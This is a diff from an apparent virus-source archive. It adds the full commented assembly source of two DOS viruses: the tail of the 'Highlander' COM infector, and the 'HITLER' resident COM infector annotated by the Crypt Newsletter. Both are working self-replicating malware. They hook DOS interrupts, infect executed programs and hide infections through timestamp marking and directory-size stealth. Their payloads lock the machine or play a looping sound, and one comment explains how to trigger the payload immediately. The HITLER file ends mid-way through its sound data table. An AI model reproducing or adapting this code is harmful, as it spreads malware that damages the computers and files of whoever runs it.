allow it +;to execute normally. If however, the virus is not resident, Interrupt 21 +;will then be trapped by the virus. Once this is accomplished, the virus +;will free all available memory that it does not need (COM programs are +;allocated all available memory when they are executed even though they can +;only occupy one segment). The viral code will then copy the original +;environment and determine the path and filename of the host program in +;memory. The viral code will then shell out and re-execute the host +;program. The virus is nearly resident now. When the virus shells out +;and re-executes the host, a non-supported value is passed in the AL +;register. This is interpreted by the virus to mean that the infection +;is in transition and that when the host is re-executed, to assume that the +;virus is already resident. This value is then changed to the proper value +;so that the shell process will execute normally (INT 21 is already trapped +;at this point). This shell process is invisible, since the viral code +;so successfully copies the original environment. Once the host has +;finished executing, control is then returned back to the original host +;(the viral code). The virus then completes execution by going resident +;using interrupt 027h. In all appearances, the host program has just +;completed normal execution and has terminated. In actuality, the virus +;is now fully resident. + +;When the virus is resident, interrupt 021h is trapped and monitored. +;When a program is executed, the resident virus gets control (DOS executes +;programs by shelling from DOS using interrupt 021h, subfunction 04bh). +;When the virus sees that a program is being executed, a series of checks +;are performed. The first thing checked for is whether or not the program +;to be executed has 'D' as the seventh letter in the filename. If it does +;the program is not infected and is allowed to execute normally (this is +;how the virus keeps from infecting COMMAND.COM. No COM file with a 'D' +;as the seventh letter will be infected). If there is no 'D' as the seventh +;letter, the virus then checks to see if the program to be executed is a +;COM file or not. If it is not a COM file, it is not infected and allowed +;to execute normally. If the COM file test is passed, the file size is then +;checked. Files are only infected if they are larger than 1024 bytes and +;smaller than 62000 bytes. If the file size is within bounds, the file +;is checked to see if it is already infected. Files are only infected +;a single time. The virus determines infection by checking the date/time +;stamp of the file. If the seconds portion of the stamp is equal to 40, +;the file is assumed to be infected. If the file is infected, the virus +;then checks the date. If it is the 29th day of any month, the virus will +;then display its irritating qualities by displaying the message +;'Highlander 1 RULES!' 21 times and then locking the machine and forcing +;a reboot. If the file is not infected, infection will proceed. The +;virus stores the original attributes and then changes the attributes to +;normal, read/write. The file length is also stored. The file is then +;opened and the first part of the file is read and stored in memory (the +;exact number of bytes is the same length as the virus). The virus then +;proceeds to overwrite the first part of the file with its own code. The +;file pointer is then adjusted to the end of the file and a short +;restoration routine is copied. The original first part of the file is +;then copied to the end of the file after the restore routine. The files +;time/date stamp is then adjusted to show an infection (the seconds portion +;of the time is set to 40. This will normally never be noticed since +;directory listings never show the seconds portion). The file is then +;closed and the original attributes are restored. Control is then passed +;to the original INT 021h routine and the now infected program is allowed +;to execute normally. + +;This virus will infect read-only files. +;COMMAND.COM will not be infected. +;It is not destructive but can be highly irritating. + + + +.model tiny +.code + IDEAL + + +begin: + jmp checkinfect ;jump over data to virus code + + +data1: + dw offset endcode+0100h ;address of restore routine +typekill: + db 01ah ;kills the DOS 'type' command +version: + db 'v05' ;virus version number +data2: + dw 0,080h,0,05ch,0,06ch,0 ;environment string for shell process +data3: + db 'COM' ;COM file check +data4: + db 0,0,1,0 ;data preceeding filename in environment +data5: + db 'Highlander 1 RULES! $' ;irritating message + + +restcode: ;restoration routine to restore host + rep movsb ;move host code back to original loc + push cs ;setup to transfer control to 0100h + mov ax,0100h + push ax + mov ax,cx ;zero ax + ret ;transfer control to 0100h and allow host + ;to execute normally + + +checkinfect: ;check to see if virus already resident + mov ax,0de00h ;unsupported subfunction + int 21h + cmp ah,0deh ;is it unchanged? + je continfect ;yes, continue going resident + ;no, already resident, restore host + + +restorehost: ;setup for restore routine + mov di,0100h ;destination of bytes to be moved + mov si,[word data1+0100h] ;address of restore routine + ;(original host) + push cs ;setup for xfer to restore routine + push si + add si,checkinfect-restcode ;source of bytes to be moved + mov cx,endcode-begin ;number of bytes to move + ret ;xfer to restore routine + + +continfect: ;continue infection + mov ax,3521h ;set ax to get INT 21 vector address + int 21h ;get INT 21 vector + mov [WORD int21trap+1+0100h],bx + ;store address in viral code + mov [WORD int21trap+3+0100h],es + ;store segment in viral code + mov dx,offset start+0100h ;set dx to start of viral code + mov ax,2521h ;set ax to change INT 21 vector + int 21h ;change INT 21 to point to virus + mov [word data2+0100h+4],ds ;copy current segment to env string + mov [word data2+0100h+8],ds ;for shell process + mov [word data2+0100h+12],ds + push ds ;restore es to current segment + pop es + mov bx,offset endcode+0100h ;set bx to end of viral code + mov cl,04 ;divide by 16 + shr bx,cl + inc bx ;INC by 1 just in case. bx is number of + ;paragraphs of memory to reserve + mov ah,04ah ;set ah to release memory + int 21h ;release all excess memory + mov ds,[word 02ch] ;get segment of environment copy + xor si,si ;zero si + cld ;clear direction flag + + +tryagain: + mov di,offset data4+0100h ;point to data preceeding filename + mov cx,4 ;data is 4 bytes long + repe cmpsb ;check for match + jne tryagain ;if no match, try again + mov dx,si ;filename found. set dx to point + mov bx,offset data2+0100h ;set bx to point to environment string + mov ax,04bffh ;set ax to shell and execute. AL contains + ;an invalid value which will be interpreted + ;by the virus (int 21 is now trapped by it) + ;and changed to 00. + cld ;clear direction flag + int 21h ;shell and re-execute the host program + mov dx,(endcode-begin)*2+0110h + ;set dx to end of virus *2 plus 10. This + ;will point to the end of the resident + ;portion of the virus + int 27h ;terminate and stay resident + + +start: ;start of virus. The trapped INT 21 points + ;to this location. + pushf ;store the flags + cmp ah,0deh ;is calling program checking for infection? + jne check4run ;no, continue on checking for execution + mov ah,0edh ;yes, change ah to 0edh + jmp cont ;jump over rest of viral code + + +check4run: + cmp ah,04bh ;check for program attempting to execute + je nextcheck ;yes, continue checks + jmp cont ;no, jump over rest of virus + + +nextcheck: + cmp al,0ffh ;check if virus is shelling. 0ffh will + ;normally never be used and is used by + ;the virus to shell the host before it is + ;fully resident. This prevents the virus + ;from shelling twice, which will work but + ;lose the environment and cause problems. + jne workvirus ;normal DOS shell. Jump to virus meat. + xor al,al ;virus is shelling. zero al. + jmp cont ;jump over rest of virus + + +workvirus: + push ax ;store all registers subject to change + push bx + push cx + push es + push si + push di + push dx + push ds + push cs ;store the code segment so it can be used + push cs ;to set the ds and es registers + pop ds ;set ds to same as cs + pop es ;set es to same as cs + mov dx,080h ;set dx to offset 080h + mov ah,01ah ;set ah to create DTA + int 21h ;create DTA at 080h (normal DTA area) + pop ds ;set ds to original ds + pop dx ;set dx to original dx (ds:dx is used to + ;point to the path and filename of the + ;program to be executed) + push dx ;store these values back + push ds + xor cx,cx ;zero cx + mov ah,04eh ;set ah to search for filename match + int 21h ;search for filename (this is primarily + ;done to setup data in the DTA so that it + ;can be checked easier than making a + ;number of individual calls) + push es ;store es (same as cs) + pop ds ;set ds to same as es and cs + cmp [byte 087h],'D' ;check for 'D' as seventh letter in file + jne j5 + jmp endvirus ;if 'D' is 7th letter, dont infect +j5: + mov si,offset data3+0100h ;set source of bytes to compare + mov di,089h ;set destination of bytes to compare + mov cx,3 ;number of bytes to compare + cld ;compare forward + repe cmpsb ;compare bytes (check to see if file's + ;extension is COM) + je j1 + jmp endvirus ;not a COM file. Dont infect +j1: + mov bx,[word 009ah] ;set bx to length of file + cmp bx,1024 ;is length > 1024? + jae j2 ;yes, continue with checks + jmp endvirus ;no, dont infect +j2: + cmp bx,62000 ;is length < 62000? + jbe j3 ;yes, continue with checks + jmp endvirus ;no, dont infect +j3: + mov ax,[word 096h] ;set ax to file's time stamp + and ax,0000000000011111b ;clear everything but seconds + cmp ax,0000000000010100b ;is seconds = 40? + jne j4 ;yes, continue with infection + mov ah,02ah ;no, set ah to get the date + int 21h ;get current system date + mov cx,21 ;set cx to 21 + cmp dl,29 ;is the date the 29th? + je irritate ;yes, continue with irritate + jmp endvirus ;no, let program execute normally + + +irritate: + mov dx,offset data5+0100h ;point dx to irritating message + mov ah,09h ;set ah to write to screen + int 21h ;write message 21 times + loop irritate + iret ;xfer program control to whatever's on + ;the stack (this almost guarantee's a + ;lockup and a reboot) + + +j4: + mov ax,[word 096h] ;set ax equal to the file's time stamp + and ax,1111111111100000b ;zero the seconds portion + or ax,0000000000010100b ;set the seconds = 40 + add bx,0100h ;set bx = loc for restore routine (end + ;of file once its in memory) + mov [word data1+0100h],bx ;store this value in the virus + mov bx,ax ;set bx = to adjusted time stamp + pop ds ;get the original ds + push ds ;store this value back + mov ax,04300h ;set ax to get the file's attributes + ;ds:dx already points to path/filename + int 21h ;get the files attributes + push cx ;push the attributes + push bx ;push the adjusted time stamp + xor cx,cx ;zero cx(attributes for normal, read/write) + mov ax,04301h ;set ax to set file attributes + int 21h ;set files attributes to normal/read/write + mov ax,03d02h ;set ax to open file + int 21h ;open file for read/write access + mov bx,ax ;mov file handle to bx + push cs ;push current code segment + pop ds ;and pop into ds (ds=cs) + mov cx,endcode-begin ;set cx equal to length of virus + mov dx,offset endcode+0100h ;point dx to end of virus in memory + mov ah,03fh ;set ah to read from file + int 21h ;read bytes from beginning of file and + ;store at end of virus. Read as many bytes + ;as virus is long. + xor cx,cx ;zero cx + xor dx,dx ;zero dx + mov ax,04200h ;set ax to move file pointer from begin + int 21h ;mov file pointer to start of file + mov cx,endcode-begin ;set cx = length of virus + mov dx,0100h ;point dx to start of virus + mov ah,040h ;set ah to write to file + int 21h ;write virus to start of file + xor cx,cx ;zero cx + xor dx,dx ;zero dx + mov ax,04202h ;set ax to move file pointer from end + int 21h ;mov file pointer to end of file + mov cx,checkinfect-restcode ;set cx to length of restore routine + mov dx,offset restcode+0100h ;point dx to start of restore routine + mov ah,040h ;set ah to write to file + int 21h ;write restore routine to end of file + mov cx,endcode-begin ;set cx to length of virus (length of code + ;read from beginning of file) + mov dx,offset endcode+0100h ;point dx to data read from file + mov ah,040h ;set ah to write to file + int 21h ;write data read from start of file to end + ;of file following restore routine + pop cx ;pop the adjusted time stamp + mov dx,[word 098h] ;mov the file date stamp into dx + mov ax,05701h ;set ax to write time/date stamp + int 21h ;write time/date stamp to file + mov ah,03eh ;set ah to close file + int 21h ;close the file + pop cx ;pop the original attributes + pop ds ;pop the original ds + pop dx ;pop the original dx + push dx ;push these values back + push ds + mov ax,04301h ;set ax to set file attributes (ds:dx now + ;points to original path/filename) + int 21h ;set the original attributes back to file + + +endvirus: ;virus execution complete. restore original + ;values for INT 21 function + pop ds + pop dx + pop di + pop si + pop es + pop cx + pop bx + pop ax + + +cont: ;virus complete. restore original flags + popf + pushf + + +int21trap: ;this calls the original INT 21 routine + db 09ah ;opcode for a far call + nop ;blank area. the original INT 21 vector + nop ;is copied to this area + nop + nop + push ax ;after the original INT 21 routine has + ;completed execution, control is returned + ;to this point + push bx + pushf ;push the flags returned from the INT 21 + ;routine. We have to get them in the + ;proper location in the stack when we + ;return to the calling program + pop ax ;pop the flags + mov bx,sp ;set bx equal to the stack pointer + mov [word ss:bx+8],ax ;copy the flags to the proper location in + ;the stack + pop bx ;restore bx + pop ax ;restore ax + iret ;return to calling program + + +signature: + db 'dex' + + +endcode: ;this file has been written as if it were + ;a natural infection. At this point the + ;virus is ended and we are at the restore + ;routine. Following this is the host code + ;which will be moved back to 0100h. This + ;file could never actually be a natural + ;infection however due to its small size + rep movsb ;start of restore routine. move host back + push cs ;set up to xfer to cs:0100h + mov ax,0100h + push ax + mov ax,cx ;zero ax + ret ;host is restored. xfer to start of host +hoststart: ;This is the host program. It consists + ;merely of a simple message being displayed + jmp skipdata ;jump over message +hostmessage: + db 'The virus is now resident.$' +skipdata: + mov ah,09h ;set ah to write to screen + mov dx,offset hostmessage+0100h + ;point dx to message to display + int 21h ;display message + mov ah,04ch ;set ah to terminate program + int 21h ;terminate program, return to DOS + END diff --git a/MSDOS/Virus.MSDOS.Unknown.hitler.a86 b/MSDOS/Virus.MSDOS.Unknown.hitler.a86 new file mode 100644 index 00000000..886b37d9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hitler.a86 @@ -0,0 +1,718 @@ +;The HITLER virus: commented in a rough 'n' ready way by the +;Crypt Newsletter staff for issue #11, January 1993. +;The HITLER virus is a memory resident .COM infector which adds itself +;to the end of infected files. HITLER employs +;minimal directory stealth. +;The minimal stealth allows the virus to subtract its file size from +;infected targets when the user takes a look at them using "dir" +;functions while the virus is in memory. +;Most of HITLER's code is devoted to a huge data table which is a voice +;sample of some nut shouting "HITLER." The virus ties the effect to +;the timer tick function, but if you want to hear it immediately, change the +;source were indicated. The resulting code will assemble under A86. On +;execution the virus will lock the PC into the voice effect until reboot, +;rendering it uninfective, if annoying. Not all PC's can generate the +;HITLER sound effect - some will just buzz. + + + call rakett ; recalculate offset +old db ' !' ; virus identification marker +rakett: pop bp + push bp + add bp,-103h + + mov ax,42ABh ; check if virus installed + int 21h + jnc failed ; exit if here + + cli + mov ax,3521h + int 21h ; get interrupt vector + mov w [bp+offset old21],bx ; es:bx points to + mov w [bp+offset old21+2],es ; interrupt handler + + mov al,1Ch + int 21h + cli + mov w [bp+offset old1C],bx ; access timer tick int. + mov w [bp+offset old1C+2],es + mov w [bp+offset teller],16380 ; stuff our value into + sti ; "teller" buffer for + ; later + call normalspeed ; eh? + + mov si,ds + std + lodsb + cld + mov ds,si + + xor bx,bx + mov cx,pgf + cmp b [bx],'Z' + jne failed + mov ax,[bx+3] + sub ax,cx + jc failed + mov [bx+3],ax + sub [bx+12h],cx + mov es,[bx+12h] + + push cs + pop ds + + mov di,100h + mov si,bp + add si,di + mov cx,size + rep movsb + + push es + pop ds + mov ax,2521h + mov dx,offset ni21 ; set int 21 route through virus + int 21h + mov al,1Ch + mov dx,offset ni1C ; revector timer tick through + int 21h ; virus + +failed: push cs + push cs + pop ds + pop es + + pop si + mov di,100h + push di + movsw + movsw + movsb + + mov cx,0FFh + mov si,100h + ret ; exit to host + + +findFCB: popf + call int21 ; look to virus "stealth" + pushf ; routine, now that int 21 + or al,al ; comes through virus + jnz backFCB + call stealth +backFCB: popf + iret + +stealth: push ax ; the following essentially massages the + push bx ; file control block on directory scans, + push dx ; subtracting the virus size from infected + push es ; files before the user sees 'em + + mov ah,2Fh ; get disk transfer address + call int21 ; + + cmp byte es:[bx],0FFh ; failed? + jne normFCB ; no, everything still OK + add bx,8 +normFCB: mov al,byte es:[bx+16h] ; retrieve seconds attribute + and al,31 ; from observed file, if it's + xor al,31 ; 31, the file is infected + jnz shitFCB ; not 31 - file not infected + mov ax,word es:[bx+1Ch] + mov dx,word es:[bx+1Ch+2] + sub ax,size ; subtract virus length from + sbb dx,0 ; infected file + jc shitFCB ; no files? exit + mov word es:[bx+1Ch],ax + mov word es:[bx+1Ch+2],dx +shitFCB: ; restore everything as normal + pop es + pop dx + pop bx + pop ax + ret + +ni21: pushf + cmp ah,11h ; any user access of the file control + je findFCB ; block must come through virus + cmp ah,12h ; ditto for here + je findFCB + + cmp ax,42ABh ; + jne not_42AB + popf + clc + retf 2 +not_42AB: + cmp ax,4B00h ; is a program being loaded? + jne not_4B00 ; exit if not + + call install_24 ; install critical error handler + + push ax + push bx + push cx + push dx + push ds + push bp + + mov ax,4300h ; get file attributes of potential host + call int21 + jc back1 ; failed? exit + mov cs:old_attr,cx ; stash attributes here + + test cl,4 ; is the potential host a system file? + jnz back1 ; yes? so exit + + mov ax,4301h ; set new file attributes, read or write + xor cx,cx + call int21 + jc back1 ; error? exit + + push dx + push ds + call infect ; begin infection stuff + pop ds + pop dx + + mov ax,4301h +db 0B9h ;mov CX,... +old_attr dw 0 + call int21 + +back1: ;go here if the attrib-get fails + pop bp + pop ds + pop dx + pop cx + pop bx + pop ax + +call remove_24 ; normalize critical error handler + +not_4B00: +back: popf + db 0EAh +old21 dw 0,0 + +int21: pushf + call dword ptr cs:old21 + ret + +infect: mov ax,3D02h ; open host file with read/write access + call int21 + jnc okay_open +bad1: ret ; was there an error? exit +okay_open: xchg bx,ax + mov ax,5700h ; get file date and file time + call int21 + push cx + mov bp,sp + push dx + + mov ah,3Fh ; read first five bytes from potential host + mov cx,5 + mov dx,offset old ; store them here + push cs + pop ds + call int21 + jc close ; error, exit? + cmp al,5 ; get the five bytes? + jne close ; no, so exit + + cmp word old[0],'MZ' ; is this an .EXE file? + je close ; yes, so go away + cmp word old[0],'ZM' ; double-check, is this an .EXE file? + je close ; yes, so go away + cmp old[0],0E9h ; does it start with a jump? + jne infect1 ; no - infect! + cmp word old[3],'!' ; does it start with the HITLER virus + jne infect1 ; marker? If no, infect! + ; (Boy, this fellow is careful!) +close: pop dx + pop cx + mov ax,5701h ; reset file date and time + call int21 + mov ah,3Eh ; close file + call int21 + ret + +infect1: mov ax,4202h ; reset pointer to end of file + xor cx,cx + xor dx,dx + call int21 + + or dx,dx + jnz close + cmp ax,59000 ; compare .COMfile size to 59,000 bytes + jae close ; greater than or equal? close file + ; HITLER is a big virus, so we don't want to + dec ax ; exceed the DOS execution boundary for .COM + dec ax ; files + dec ax + + mov word ptr putjmp[1],ax + + mov ah,40h ; write HITLER to the target file + mov cx,size ; length in CX + mov dx,100h + call int21 + jc close + cmp ax,size ; again, we're being real careful + jne close ; not to infect ourself + + mov ax,4200h ; set file pointer to beginning of host + xor cx,cx + xor dx,dx + call int21 + + mov ah,40h ; write the first five bytes of the + mov cx,5 ; viral jump and ID strings to the + mov dx,offset putjmp ; beginning of the host file + call int21 + + or byte ss:[bp],31 ; set the seconds field to 31, so the + ; "stealth" routine has its cue + jmp close ; close the file and clean up + +putjmp db 0E9h + dw 0 + db '!' + +install_24: pushf ; installation of critical error + cli ; handler (no shit, Sherlock!) + push bx + push ds + xor bx,bx + mov ds,bx + push ds + lds bx,[24h*4] + mov cs:old24[0],bx + mov cs:old24[2],ds + pop ds + mov word [(24h*4)],offset ni24 + mov [(24h*4)+2],cs + pop ds + pop bx + sti + popf + ret + +remove_24: pushf ; remove it + cli + push bx + push es + push ds + xor bx,bx + mov ds,bx + les bx,cs:old24[0] + + mov [(24h*4)],bx + mov [(24h*4)+2],es + + pop ds + pop es + pop bx + sti + popf + ret + +errflag db 0 + +db 'Hitler Virus by Dreamer/DY',0 ; ID note by Dreamer of Demoralized + ; Youth +ni24: mov al,3 + mov cs:errflag,1 + iret + +old24 dw 0,0 + +xofs dw offset sample +len equ 4131 +divisor equ 230 +teller dw 16380 ; "new" timer tick values for viral + ; trigger +ni1C: + cli + pushf + push ax + push ds + push si + + push cs + pop ds + ; -lobotomize code from here to marker to get HITLER at start + cmp teller,0 ; compare 0 with the value the virus + je teller_ok ; stuffed into the timer tick interrupt + dec teller ; if equal - do "HITLER!" thing, if not + jmp noreset ; decrement the value + ; -bottom of lobotomy marker +teller_ok: ; sound routine to the IBM internal speaker + mov al,34h + db 0E6h,43h ;out 43h,al + mov al,divisor + db 0E6h,40h ;out 40h,al + mov al,0 + db 0E6h,40h ;out 40h,al + + mov al,090h + db 0E6h,43h ;out 43h,al + mov si,xofs + lodsb + db 0E6h,42h ;out 42h,al + + db 0E4h,61h ;in al,61h + or al,3 + db 0E6h,61h ;out al,61h + + inc xofs + cmp xofs,len+offset sample ; points to the huge table at + jb noreset ; the end of the virus, a + mov xofs,offset sample ; .VOC sample of some nut +noreset: ; shouting "HITLER!" + sti + pop si + pop ds + pop ax + popf + + db 0EAh +old1C dw 0,0 + +normalspeed: cli + push ax + mov al,34h + db 0E6h,43h + mov al,0 + db 0E6h,40h + db 0E6h,40h + pop ax + sti + ret + +sample: + + + + + db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h + db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h + db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h + db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah + db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh + db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h + db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh + db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h + db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh + db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h + db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h + db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h + db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah + db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h + db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh + db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h + db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh + db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh + db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah + db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch + db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h + db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h + db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h + db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h + db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h + db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h + db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh + db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h + db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h + db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h + db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh + db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h + db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h + db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h + db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h + db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h + db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h + db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh + db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h + db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh + db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh + db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h + db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh + db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh + db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h + db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh + db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh + db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h + db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h + db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah + db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h + db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h + db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h + db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh + db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h + db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h + db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h + db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h + db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh + db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h + db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h + db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h + db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh + db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h + db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh + db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh + db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah + db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h + db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h + db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh + db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h + db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh + db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh + db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h + db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh + db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h + db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah + db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah + db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h + db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch + db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h + db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h + db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h + db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h + db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h + db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah + db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h + db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh + db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h + db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h + db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah + db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h + db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h + db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh + db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h + db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh + db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h + db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h + db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch + db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h + db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh + db 